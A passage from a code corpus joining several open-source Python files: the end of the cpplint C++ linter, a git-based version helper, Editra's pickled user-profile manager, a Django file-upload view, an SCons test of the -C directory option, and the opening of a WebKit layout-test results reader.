if pattern.search(line):
required[header] = (linenum, template)
# The following function is just a speed up, no semantics are changed.
if not '<' in line: # Reduces the cpu time usage by skipping lines.
continue
for pattern, template, header in _re_pattern_templates:
if pattern.search(line):
required[header] = (linenum, template)
# The policy is that if you #include something in foo.h you don't need to
# include it again in foo.cc. Here, we will look at possible includes.
# Let's copy the include_state so it is only messed up within this function.
include_state = include_state.copy()
# Did we find the header for this file (if any) and succesfully load it?
header_found = False
# Use the absolute path so that matching works properly.
abs_filename = FileInfo(filename).FullName()
# For Emacs's flymake.
# If cpplint is invoked from Emacs's flymake, a temporary file is generated
# by flymake and that file name might end with '_flymake.cc'. In that case,
# restore original file name here so that the corresponding header file can be
# found.
# e.g. If the file name is 'foo_flymake.cc', we should search for 'foo.h'
# instead of 'foo_flymake.h'
abs_filename = re.sub(r'_flymake\.cc$', '.cc', abs_filename)
# include_state is modified during iteration, so we iterate over a copy of
# the keys.
header_keys = include_state.keys()
for header in header_keys:
(same_module, common_path) = FilesBelongToSameModule(abs_filename, header)
fullpath = common_path + header
if same_module and UpdateIncludeState(fullpath, include_state, io):
header_found = True
# If we can't find the header file for a .cc, assume it's because we don't
# know where to look. In that case we'll give up as we're not sure they
# didn't include it in the .h file.
# TODO(unknown): Do a better job of finding .h files so we are confident that
# not having the .h file means there isn't one.
if filename.endswith('.cc') and not header_found:
return
# All the lines have been processed, report the errors found.
for required_header_unstripped in required:
template = required[required_header_unstripped][1]
if required_header_unstripped.strip('<>"') not in include_state:
error(filename, required[required_header_unstripped][0],
'build/include_what_you_use', 4,
'Add #include ' + required_header_unstripped + ' for ' + template)
_RE_PATTERN_EXPLICIT_MAKEPAIR = re.compile(r'\bmake_pair\s*<')
def CheckMakePairUsesDeduction(filename, clean_lines, linenum, error):
"""Check that make_pair's template arguments are deduced.
G++ 4.6 in C++0x mode fails badly if make_pair's template arguments are
specified explicitly, and such use isn't intended in any case.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
raw = clean_lines.raw_lines
line = raw[linenum]
match = _RE_PATTERN_EXPLICIT_MAKEPAIR.search(line)
if match:
error(filename, linenum, 'build/explicit_make_pair',
4, # 4 = high confidence
'For C++11-compatibility, omit template arguments from make_pair'
' OR use pair directly OR if appropriate, construct a pair directly')
def ProcessLine(filename, file_extension, clean_lines, line,
include_state, function_state, nesting_state, error,
extra_check_functions=[]):
"""Processes a single line in the file.
Args:
filename: Filename of the file that is being processed.
file_extension: The extension (dot not included) of the file.
clean_lines: An array of strings, each representing a line of the file,
with comments stripped.
line: Number of line being processed.
include_state: An _IncludeState instance in which the headers are inserted.
function_state: A _FunctionState instance which counts function lines, etc.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: A callable to which errors are reported, which takes 4 arguments:
filename, line number, error level, and message
extra_check_functions: An array of additional check functions that will be
run on each source line. Each function takes 4
arguments: filename, clean_lines, line, error
"""
raw_lines = clean_lines.raw_lines
ParseNolintSuppressions(filename, raw_lines[line], line, error)
nesting_state.Update(filename, clean_lines, line, error)
if nesting_state.stack and nesting_state.stack[-1].inline_asm != _NO_ASM:
return
CheckForFunctionLengths(filename, clean_lines, line, function_state, error)
CheckForMultilineCommentsAndStrings(filename, clean_lines, line, error)
CheckStyle(filename, clean_lines, line, file_extension, nesting_state, error)
CheckLanguage(filename, clean_lines, line, file_extension, include_state,
error)
CheckForNonStandardConstructs(filename, clean_lines, line,
nesting_state, error)
CheckPosixThreading(filename, clean_lines, line, error)
CheckInvalidIncrement(filename, clean_lines, line, error)
CheckMakePairUsesDeduction(filename, clean_lines, line, error)
for check_fn in extra_check_functions:
check_fn(filename, clean_lines, line, error)
def ProcessFileData(filename, file_extension, lines, error,
extra_check_functions=[]):
"""Performs lint checks and reports any errors to the given error function.
Args:
filename: Filename of the file that is being processed.
file_extension: The extension (dot not included) of the file.
lines: An array of strings, each representing a line of the file, with the
last element being empty if the file is terminated with a newline.
error: A callable to which errors are reported, which takes 4 arguments:
filename, line number, error level, and message
extra_check_functions: An array of additional check functions that will be
run on each source line. Each function takes 4
arguments: filename, clean_lines, line, error
"""
lines = (['// marker so line numbers and indices both start at 1'] + lines +
['// marker so line numbers end in a known way'])
include_state = _IncludeState()
function_state = _FunctionState()
nesting_state = _NestingState()
ResetNolintSuppressions()
CheckForCopyright(filename, lines, error)
if file_extension == 'h':
CheckForHeaderGuard(filename, lines, error)
RemoveMultiLineComments(filename, lines, error)
clean_lines = CleansedLines(lines)
for line in xrange(clean_lines.NumLines()):
ProcessLine(filename, file_extension, clean_lines, line,
include_state, function_state, nesting_state, error,
extra_check_functions)
nesting_state.CheckClassFinished(filename, error)
CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error)
# We check here rather than inside ProcessLine so that we see raw
# lines rather than "cleaned" lines.
CheckForUnicodeReplacementCharacters(filename, lines, error)
CheckForNewlineAtEOF(filename, lines, error)
def ProcessFile(filename, vlevel, extra_check_functions=[]):
"""Does google-lint on a single file.
Args:
filename: The name of the file to parse.
vlevel: The level of errors to report. Every error of confidence
>= verbose_level will be reported. 0 is a good default.
extra_check_functions: An array of additional check functions that will be
run on each source line. Each function takes 4
arguments: filename, clean_lines, line, error
"""
_SetVerboseLevel(vlevel)
try:
# Support the UNIX convention of using "-" for stdin. Note that
# we are not opening the file with universal newline support
# (which codecs doesn't support anyway), so the resulting lines do
# contain trailing '\r' characters if we are reading a file that
# has CRLF endings.
# If after the split a trailing '\r' is present, it is removed
# below. If it is not expected to be present (i.e. os.linesep !=
# '\r\n' as in Windows), a warning is issued below if this file
# is processed.
if filename == '-':
lines = codecs.StreamReaderWriter(sys.stdin,
codecs.getreader('utf8'),
codecs.getwriter('utf8'),
'replace').read().split('\n')
else:
lines = codecs.open(filename, 'r', 'utf8', 'replace').read().split('\n')
carriage_return_found = False
# Remove trailing '\r'.
for linenum in range(len(lines)):
if lines[linenum].endswith('\r'):
lines[linenum] = lines[linenum].rstrip('\r')
carriage_return_found = True
except IOError:
sys.stderr.write(
"Skipping input '%s': Can't open for reading\n" % filename)
return
# Note, if no dot is found, this will give the entire filename as the ext.
file_extension = filename[filename.rfind('.') + 1:]
# When reading from stdin, the extension is unknown, so no cpplint tests
# should rely on the extension.
if (filename != '-' and file_extension != 'cc' and file_extension != 'h'
and file_extension != 'cpp'):
sys.stderr.write('Ignoring %s; not a .cc or .h file\n' % filename)
else:
ProcessFileData(filename, file_extension, lines, Error,
extra_check_functions)
if carriage_return_found and os.linesep != '\r\n':
# Use 0 for linenum since outputting only one error for potentially
# several lines.
Error(filename, 0, 'whitespace/newline', 1,
'One or more unexpected \\r (^M) found;'
'better to use only a \\n')
sys.stderr.write('Done processing %s\n' % filename)
def PrintUsage(message):
"""Prints a brief usage string and exits, optionally with an error message.
Args:
message: The optional error message.
"""
sys.stderr.write(_USAGE)
if message:
sys.exit('\nFATAL ERROR: ' + message)
else:
sys.exit(1)
def PrintCategories():
"""Prints a list of all the error-categories used by error messages.
These are the categories used to filter messages via --filter.
"""
sys.stderr.write(''.join(' %s\n' % cat for cat in _ERROR_CATEGORIES))
sys.exit(0)
def ParseArguments(args):
"""Parses the command line arguments.
This may set the output format and verbosity level as side-effects.
Args:
args: The command line arguments:
Returns:
The list of filenames to lint.
"""
try:
(opts, filenames) = getopt.getopt(args, '', ['help', 'output=', 'verbose=',
'counting=',
'filter=',
'root='])
except getopt.GetoptError:
PrintUsage('Invalid arguments.')
verbosity = _VerboseLevel()
output_format = _OutputFormat()
filters = ''
counting_style = ''
for (opt, val) in opts:
if opt == '--help':
PrintUsage(None)
elif opt == '--output':
if not val in ('emacs', 'vs7', 'eclipse'):
PrintUsage('The only allowed output formats are emacs, vs7 and eclipse.')
output_format = val
elif opt == '--verbose':
verbosity = int(val)
elif opt == '--filter':
filters = val
if not filters:
PrintCategories()
elif opt == '--counting':
if val not in ('total', 'toplevel', 'detailed'):
PrintUsage('Valid counting options are total, toplevel, and detailed')
counting_style = val
elif opt == '--root':
global _root
_root = val
if not filenames:
PrintUsage('No files were specified.')
_SetOutputFormat(output_format)
_SetVerboseLevel(verbosity)
_SetFilters(filters)
_SetCountingStyle(counting_style)
return filenames
def main():
filenames = ParseArguments(sys.argv[1:])
# Change stderr to write with replacement characters so we don't die
# if we try to print something containing non-ASCII characters.
sys.stderr = codecs.StreamReaderWriter(sys.stderr,
codecs.getreader('utf8'),
codecs.getwriter('utf8'),
'replace')
_cpplint_state.ResetErrorCounts()
for filename in filenames:
ProcessFile(filename, _cpplint_state.verbose_level)
_cpplint_state.PrintErrorCounts()
sys.exit(_cpplint_state.error_count > 0)
if __name__ == '__main__':
main()
| gpl-3.0 |
xs2maverick/adhocracy3.mercator | src/adhocracy_spd/version.py | 26 | 3208 | # -*- coding: utf-8 -*-
# Author: Douglas Creager <dcreager@dcreager.net>
# This file is placed into the public domain.
# Calculates the current version number. If possible, this is the
# output of “git describe”, modified to conform to the versioning
# scheme that setuptools uses. If “git describe” returns an error
# (most likely because we're in an unpacked copy of a release tarball,
# rather than in a git working copy), then we fall back on reading the
# contents of the RELEASE-VERSION file.
#
# To use this script, simply import it your setup.py file, and use the
# results of get_git_version() as your package version:
#
# from version import *
#
# setup(
# version=get_git_version(),
# .
# .
# .
# )
#
# This will automatically update the RELEASE-VERSION file, if
# necessary. Note that the RELEASE-VERSION file should *not* be
# checked into git; please add it to your top-level .gitignore file.
#
# You'll probably want to distribute the RELEASE-VERSION file in your
# sdist tarballs; to do this, just create a MANIFEST.in file that
# contains the following line:
#
# include RELEASE-VERSION
"""Provide helper functions for getting a version number."""
from subprocess import Popen, PIPE
def call_git_describe(abbrev=4):
"""Call git describe to get the current version number."""
try:
p = Popen(['git', 'describe', '--abbrev=%d' % abbrev],
stdout=PIPE, stderr=PIPE)
p.stderr.close()
line = p.stdout.readlines()[0]
return line.decode('utf-8').strip()
except:
return None
def read_release_version():
""" Read current version number from RELEASE-VERSION."""
try:
f = open('RELEASE-VERSION', 'r')
try:
version = f.readlines()[0]
return version.strip()
finally:
f.close()
except:
return None
def write_release_version(version):
"""Write version number to RELEASE-VERSION."""
f = open('RELEASE-VERSION', 'w')
f.write('%s\n' % version)
f.close()
def get_git_version(abbrev=4):
"""Try to get version from git and fallback to file. """
# Read in the version that's currently in RELEASE-VERSION.
release_version = read_release_version()
# First try to get the current version using “git describe”.
version = call_git_describe(abbrev)
# Adapt to PEP 386 compatible versioning scheme
if (version is not None) and ('-' in version):
parts = version.split('-')
parts[-2] = 'post' + parts[-2]
version = '.'.join(parts[:-1])
# If that doesn't work, fall back on the value that's in
# RELEASE-VERSION.
if version is None:
version = release_version
# If we still don't have anything, that's an error.
if version is None:
raise ValueError('Cannot find the version number!')
# If the current version is different from what's in the
# RELEASE-VERSION file, update the file to be current.
if version != release_version:
write_release_version(version)
# Finally, return the current version.
return version
__all__ = ('get_git_version')
if __name__ == '__main__':
print(get_git_version())
| agpl-3.0 |
163gal/Time-Line | libs/wx/tools/Editra/src/profiler.py | 2 | 18345 | ###############################################################################
# Name: profiler.py #
# Purpose: Editra's user profile services #
# Author: Cody Precord <cprecord@editra.org> #
# Copyright: (c) 2008 Cody Precord <staff@editra.org> #
# License: wxWindows License #
###############################################################################
"""
This module provides the profile object and support functions for loading and
saving user preferences between sessions. The preferences are saved on disk as
a cPickle, because of this no objects that cannot be resolved in the namespace
of this module prior to starting the mainloop must not be put in the Profile as
it will cause errors on load. Ths means that only builtin python types should
be used and that a translation from that type to the required type should
happen during run time.
@summary: Editra's user profile management
"""
__author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: profiler.py 63791 2010-03-30 02:57:15Z CJP $"
__revision__ = "$Revision: 63791 $"
#--------------------------------------------------------------------------#
# Imports
import os
import sys
import cPickle
import wx
# Editra Imports
from ed_glob import CONFIG, PROG_NAME, VERSION, PRINT_BLACK_WHITE, EOL_MODE_LF
import util
import dev_tool
import ed_msg
_ = wx.GetTranslation
#--------------------------------------------------------------------------#
# Globals
_DEFAULTS = {
'ALPHA' : 255, # Transparency level (0-255)
'AALIASING' : False, # Use Anti-Aliasing if availble
'APPSPLASH' : True, # Show splash at startup
'AUTOBACKUP' : False, # Automatically backup files
'AUTOBACKUP_PATH' : '', # Backup path
'AUTO_COMP' : True, # Use Auto-comp if available
'AUTO_COMP_EX' : False, # Use extended autocompletion
'AUTO_INDENT': True, # Use Auto Indent
'AUTO_TRIM_WS' : False, # Trim whitespace on save
'AUTO_RELOAD' : False, # Automatically reload files?
'BRACKETHL' : True, # Use bracket highlighting
'BSUNINDENT' : True, # Backspace Unindents
'CTRLBAR' : dict(), # ControlBar layouts
'CHECKMOD' : True, # Auto check file for file mod
'CHECKUPDATE': True, # Check for updates on start
'CODE_FOLD' : True, # Use code folding
'DEFAULT_LEX': 'Plain Text', # Default lexer for new documents
'DEFAULT' : False, # No longer used I believe
'DEFAULT_VIEW' : 'Automatic', # Default Perspective
'EDGE' : 80, # Edge guide column
'ENCODING' : None, # Prefered text encoding
'EOL_MODE' : EOL_MODE_LF, # EOL mode 1 == LF, 2 == CRLF
'FHIST' : list(), # List of history files
'FHIST_LVL' : 9, # Filehistory length (9 is max)
'FFILTER' : 0, # Last file filter used
'GUIDES' : False, # Use Indentation guides
'HLCARETLINE': False, # Highlight Caret Line
'ICONS' : 'Tango', # Icon Theme
'ICON_SZ' : (24, 24), # Toolbar Icon Size
'INDENTWIDTH': 4, # Default indent width
'ISBINARY' : False, # Is this instance a binary
'KEY_PROFILE': None, # Keybinding profile
'LANG' : 'Default', # UI language
'LASTCHECK' : 0, # Last time update check was done
#'LEXERMENU' : [lang_name,] # Created on an as needed basis
'MAXIMIZED' : False, # Was window maximized on exit
'MODE' : 'CODE', # Overall editor mode
'MYPROFILE' : 'default.ppb', # Path to profile file
'OPEN_NW' : False, # Open files in new windows
'PRINT_MODE' : PRINT_BLACK_WHITE,# Printer rendering mode
'PROXY_SETTINGS' : dict(), # Proxy Server Settings
'REPORTER' : True, # Error Reporter is Active
'SAVE_POS' : True, # Remember Carat positions
'SAVE_SESSION' : False, # Load previous session on startup
'SEARCH_LOC' : list(), # Recent Search Locations
'SEARCH_FILTER' : '', # Last used search filter
'SESSION_KEY' : '', # Ipc Session Server Key
'SET_WPOS' : True, # Remember window position
'SET_WSIZE' : True, # Remember mainwindow size on exit
'SHOW_EDGE' : True, # Show Edge Guide
'SHOW_EOL' : False, # Show EOL markers
'SHOW_LN' : True, # Show Line Numbers
'SHOW_WS' : False, # Show whitespace markers
'SPELLCHECK' : dict(auto=False,
dict='en_US',
epath=None), # Spell checking preferences
'STATBAR' : True, # Show Status Bar
'SYNTAX' : True, # Use Syntax Highlighting
'SYNTHEME' : 'Default', # Syntax Highlight color scheme
'TABICONS' : True, # Show Tab Icons
'TABWIDTH' : 8, # Tab width
'THEME' : 'DEFAULT', # For future use
'TOOLBAR' : True, # Show Toolbar
'USETABS' : False, # Use tabs instead of spaces
'USE_PROXY' : False, # Use Proxy server settings?
'VI_EMU' : False, # Use Vi emulation mode
'VI_NORMAL_DEFAULT' : False, # Use Normal mode by default
'WARN_EOL' : True, # Warn about mixed eol characters
'WRAP' : False, # Use Wordwrap
'WSIZE' : (700, 450) # Mainwindow size
#FONT1 created at runtime by ed_styles as primary font
#FONT2 created at runtime by ed_styles as secondary font
#FONT3 Standard Font by UI, added to profile when customized
}
#--------------------------------------------------------------------------#
class Profile(dict):
"""Class for managing profile data. All data is stored as builtin
python objects (i.e. str, tuple, list, ect...) however on a request
for data the object can be transformed in to a requested type where
applicable. The profile saves itself to disk using the cPickle module
to preserve data types and allow for easy loading.
"""
_instance = None
_created = False
def __init__(self):
"""Initialize the profile"""
if not self._created:
dict.__init__(self)
else:
pass
def __new__(cls, *args, **kargs):
"""Maintain only a single instance of this object
@return: instance of this class
"""
if cls._instance is None:
cls._instance = dict.__new__(cls, *args, **kargs)
return cls._instance
#---- End Private Members ----#
#---- Begin Public Members ----#
def DeleteItem(self, item):
"""Removes an entry from the profile
@param item: items name
@type item: string
"""
if item in self:
del self[item]
else:
pass
def Get(self, index, fmt=None, default=None):
"""Gets the specified item from the data set
@param index: index of item to get
@keyword fmt: format the item should be in
@keyword default: Default value to return if index is
not in profile.
"""
if index in self:
val = self.__getitem__(index)
else:
return default
if fmt is None:
return val
else:
return _ToObject(index, val, fmt)
def Load(self, path):
"""Load the profiles data set with data from the given file
@param path: path to file to load data from
@note: The files data must have been written with a pickler
"""
if os.path.exists(path):
try:
fhandle = open(path, 'rb')
val = cPickle.load(fhandle)
fhandle.close()
except (IOError, SystemError, OSError,
cPickle.UnpicklingError, EOFError), msg:
dev_tool.DEBUGP("[profile][err] %s" % str(msg))
else:
if isinstance(val, dict):
self.update(val)
self.Set('MYPROFILE', path)
dev_tool.DEBUGP("[profile][info] Loaded %s" % path)
else:
dev_tool.DEBUGP("[profile][err] %s does not exist" % path)
dev_tool.DEBUGP("[profile][info] Loading defaults")
self.LoadDefaults()
self.Set('MYPROFILE', path)
return False
# Update profile to any keys that are missing
for key in _DEFAULTS:
if key not in self:
self.Set(key, _DEFAULTS[key])
return True
def LoadDefaults(self):
"""Loads the default values into the profile
@return: None
"""
self.clear()
self.update(_DEFAULTS)
def Set(self, index, val, fmt=None):
"""Set the value of the given index
@param index: Index to set
@param val: Value to set
@keyword fmt: Format to convert to string from
"""
if fmt is None:
self.__setitem__(index, val)
else:
self.__setitem__(index, _FromObject(val, fmt))
# Notify all clients with the configuration change message
ed_msg.PostMessage(ed_msg.EDMSG_PROFILE_CHANGE + (index,), val)
def Write(self, path):
"""Write the dataset of this profile as a pickle
@param path: path to where to write the pickle
@return: True on success / False on failure
"""
try:
# Only write if given an absolute path
if not os.path.isabs(path):
return False
self.Set('MYPROFILE', path)
fhandle = open(path, 'wb')
cPickle.dump(self.copy(), fhandle, cPickle.HIGHEST_PROTOCOL)
fhandle.close()
UpdateProfileLoader()
except (IOError, cPickle.PickleError), msg:
dev_tool.DEBUGP(u"[profile][err] %s" % msg)
return False
else:
return True
def Update(self, update=None):
"""Update the profile using data from provided dictionary
or the default set if none is given.
@keyword update: dictionary of values to update from or None
@postcondition: All profile values from the update set are set
in this profile. If update is None then the current
set is only updated to include values from the
DEFAULTS that are not currently present.
"""
if update is None:
for key, val in _DEFAULTS.iteritems():
if key not in self:
self.Set(key, val)
else:
self.update(update)
#---- End Public Members ----#
#-----------------------------------------------------------------------------#
# Singleton reference instance
TheProfile = Profile()
#-----------------------------------------------------------------------------#
# Profile convenience functions
def Profile_Del(item):
"""Removes an item from the profile
@param item: items key name
"""
TheProfile.DeleteItem(item)
def Profile_Get(index, fmt=None, default=None):
"""Convenience for Profile().Get()
@param index: profile index to retrieve
@keyword fmt: format to get value as
@keyword default: default value to return if not found
"""
return TheProfile.Get(index, fmt, default)
def Profile_Set(index, val, fmt=None):
"""Convenience for Profile().Set()
@param index: profile index to set
@param val: value to set index to
@keyword fmt: format to convert object from
"""
return TheProfile.Set(index, val, fmt)
def _FromObject(val, fmt):
"""Convert the given value to a to a profile compatible value
@param val: value to convert
@param fmt: Format to convert to
@type fmt: string
"""
if fmt == u'font' and isinstance(val, wx.Font):
return "%s,%s" % (val.GetFaceName(), val.GetPointSize())
else:
return val
def _ToObject(index, val, fmt):
"""Convert the given value to a different object
@param index: fallback to retrieve item from defaults
@param val: value to convert
@param fmt: Format to convert to
@type fmt: string
@todo: exception handling,
"""
tmp = fmt.lower()
if tmp == u'font':
fnt = val.split(',')
rval = wx.FFont(int(fnt[1]), wx.DEFAULT, face=fnt[0])
elif tmp == u'bool':
if isinstance(val, bool):
rval = val
else:
rval = _DEFAULTS.get(index, False)
elif tmp == u'size_tuple':
if len(val) == 2 and \
isinstance(val[0], int) and isinstance(val[1], int):
rval = val
else:
rval = _DEFAULTS.get(index, wx.DefaultSize)
elif tmp == u'str':
rval = unicode(val)
elif tmp == u'int':
if isinstance(val, int):
rval = val
elif isinstance(val, basestring) and val.isdigit():
rval = int(val)
else:
rval = _DEFAULTS.get(index)
else:
return val
return rval
#---- Begin Function Definitions ----#
def AddFileHistoryToProfile(file_history):
"""Manages work of adding a file from the profile in order
to allow the top files from the history to be available
the next time the user opens the program.
@param file_history: add saved files to history list
"""
files = list()
for fnum in xrange(file_history.GetNoHistoryFiles()):
files.append(file_history.GetHistoryFile(fnum))
Profile_Set('FHIST', files)
def CalcVersionValue(ver_str="0.0.0"):
"""Calculates a version value from the provided dot-formated string
1) SPECIFICATION: Version value calculation AA.BBB.CCC
- major values: < 1 (i.e 0.0.85 = 0.850)
- minor values: 1 - 999 (i.e 0.1.85 = 1.850)
- micro values: >= 1000 (i.e 1.1.85 = 1001.850)
@keyword ver_str: Version string to calculate value of
"""
ver_str = ''.join([char for char in ver_str
if char.isdigit() or char == '.'])
ver_lvl = ver_str.split(u".")
if len(ver_lvl) < 3:
return 0
major = int(ver_lvl[0]) * 1000
minor = int(ver_lvl[1])
if len(ver_lvl[2]) <= 2:
ver_lvl[2] += u'0'
micro = float(ver_lvl[2]) / 1000
return float(major) + float(minor) + micro
def GetLoader():
"""Finds the loader to use
@return: path to profile loader
@note: path may not exist, only returns the path to where the loader
should be.
"""
cbase = CONFIG['CONFIG_BASE']
if cbase is None:
cbase = wx.StandardPaths_Get().GetUserDataDir()
loader = os.path.join(cbase, u"profiles", u".loader2")
return loader
def GetProfileStr():
"""Reads the profile string from the loader and returns it.
The profile string must be the first line in the loader file.
@return: path of profile used in last session
"""
reader = util.GetFileReader(GetLoader())
if reader == -1:
# So return the default
return CONFIG['PROFILE_DIR'] + u"default.ppb"
profile = reader.readline()
profile = profile.split("\n")[0] # strip newline from end
reader.close()
return profile
def ProfileIsCurrent():
"""Checks if profile is compatible with current editor version
and returns a bool stating if it is or not.
@return: whether profile on disk was written with current program version
"""
if CalcVersionValue(ProfileVersionStr()) >= CalcVersionValue(VERSION):
return True
else:
return False
def ProfileVersionStr():
"""Checks the Loader for the profile version string and
returns the version string. If there is an error or the
string is not found it returns a zero version string.
@return: the version string value from the profile loader file
"""
loader = GetLoader()
reader = util.GetFileReader(loader, sys.getfilesystemencoding())
if reader == -1:
return "0.0.0"
ret_val = "0.0.0"
count = 0
while True:
count += 1
value = reader.readline()
value = value.split()
if len(value) > 0:
if value[0] == u'VERSION':
ret_val = value[1]
break
# Give up after 20 lines if version string not found
if count > 20:
break
reader.close()
return ret_val
def UpdateProfileLoader():
"""Updates Loader File
@precondition: MYPROFILE has been set
@postcondition: on disk profile loader is updated
@return: 0 if no error, non zero for error condition
"""
writer = util.GetFileWriter(GetLoader())
if writer == -1:
return 1
prof_name = Profile_Get('MYPROFILE')
if not prof_name or not os.path.isabs(prof_name):
prof_name = CONFIG['PROFILE_DIR'] + 'default.ppb'
if not os.path.exists(prof_name):
prof_name = os.path.join(CONFIG['CONFIG_DIR'],
os.path.basename(prof_name))
Profile_Set('MYPROFILE', prof_name)
# Use just the relative profile name for local(portable) config paths
if CONFIG['ISLOCAL']:
prof_name = os.path.basename(prof_name)
writer.write(prof_name)
writer.write(u"\nVERSION\t" + VERSION)
writer.close()
return 0
| gpl-3.0 |
vstoykov/django-sticky-uploads | stickyuploads/views.py | 1 | 1588 | from __future__ import unicode_literals
import json
from django.core.files.storage import get_storage_class
from django.http import HttpResponse, HttpResponseForbidden
from django.views.generic import View
from .forms import UploadForm
class UploadView(View):
"""Base view class for accepting file uploads."""
form_class = UploadForm
storage_class = 'stickyuploads.storage.TempFileSystemStorage'
def post(self, *args, **kwargs):
"""Save file and return saved info or report errors."""
if self.upload_allowed():
form = self.get_upload_form()
result = {}
if form.is_valid():
storage = self.get_storage()
result['is_valid'] = True
info = form.stash(storage, self.request.path)
result.update(info)
else:
result.update({
'is_valid': False,
'errors': form.errors,
})
return HttpResponse(json.dumps(result), content_type='application/json')
else:
return HttpResponseForbidden()
def get_storage(self):
"""Get storage instance for saving the temporary upload."""
return get_storage_class(self.storage_class)()
def upload_allowed(self):
"""Check if the current request is allowed to upload files."""
return self.request.user.is_authenticated()
def get_upload_form(self):
"""Construct form for accepting file upload."""
return self.form_class(self.request.POST, self.request.FILES) | bsd-3-clause |
timj/scons | test/option--C.py | 1 | 3439 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os
import TestSCons
def match_normcase(lines, matches):
if not isinstance(lines, list):
lines = lines.split("\n")
if not isinstance(matches, list):
matches = matches.split("\n")
if len(lines) != len(matches):
return
for i in range(len(lines)):
if os.path.normcase(lines[i]) != os.path.normcase(matches[i]):
return
return 1
test = TestSCons.TestSCons(match=match_normcase)
wpath = test.workpath()
wpath_sub = test.workpath('sub')
wpath_sub_dir = test.workpath('sub', 'dir')
wpath_sub_foo_bar = test.workpath('sub', 'foo', 'bar')
test.subdir('sub', ['sub', 'dir'])
test.write('SConstruct', """
import os
print("SConstruct", os.getcwd())
""")
test.write(['sub', 'SConstruct'], """
import os
print(GetBuildPath('..'))
""")
test.write(['sub', 'dir', 'SConstruct'], """
import os
env = Environment(FOO='foo', BAR='bar')
print(env.GetBuildPath('../$FOO/$BAR'))
""")
test.run(arguments = '-C sub .',
stdout = "scons: Entering directory `%s'\n" % wpath_sub \
+ test.wrap_stdout(read_str = '%s\n' % wpath,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = '-C sub -C dir .',
stdout = "scons: Entering directory `%s'\n" % wpath_sub_dir \
+ test.wrap_stdout(read_str = '%s\n' % wpath_sub_foo_bar,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = ".",
stdout = test.wrap_stdout(read_str = 'SConstruct %s\n' % wpath,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = '--directory=sub/dir .',
stdout = "scons: Entering directory `%s'\n" % wpath_sub_dir \
+ test.wrap_stdout(read_str = '%s\n' % wpath_sub_foo_bar,
build_str = "scons: `.' is up to date.\n"))
test.run(arguments = '-C %s -C %s .' % (wpath_sub_dir, wpath_sub),
stdout = "scons: Entering directory `%s'\n" % wpath_sub \
+ test.wrap_stdout(read_str = '%s\n' % wpath,
build_str = "scons: `.' is up to date.\n"))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit |
thomasrogers03/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/layouttestresultsreader.py | 124 | 4953 | # Copyright (c) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
from webkitpy.common.net.layouttestresults import LayoutTestResults
from webkitpy.common.net.unittestresults import UnitTestResults
from webkitpy.tool.steps.runtests import RunTests
_log = logging.getLogger(__name__)
# FIXME: This class no longer has a clear purpose, and should probably
# be made part of Port, or renamed to LayoutTestResultsArchiver or something more fitting?
class LayoutTestResultsReader(object):
def __init__(self, host, results_directory, archive_directory):
self._host = host
self._results_directory = results_directory
self._archive_directory = archive_directory
# FIXME: This exists for mocking, but should instead be mocked via
# host.filesystem.read_text_file. They have different error handling at the moment.
def _read_file_contents(self, path):
try:
return self._host.filesystem.read_text_file(path)
except IOError, e: # File does not exist or can't be read.
return None
# FIXME: This logic should move to the port object.
def _create_layout_test_results(self):
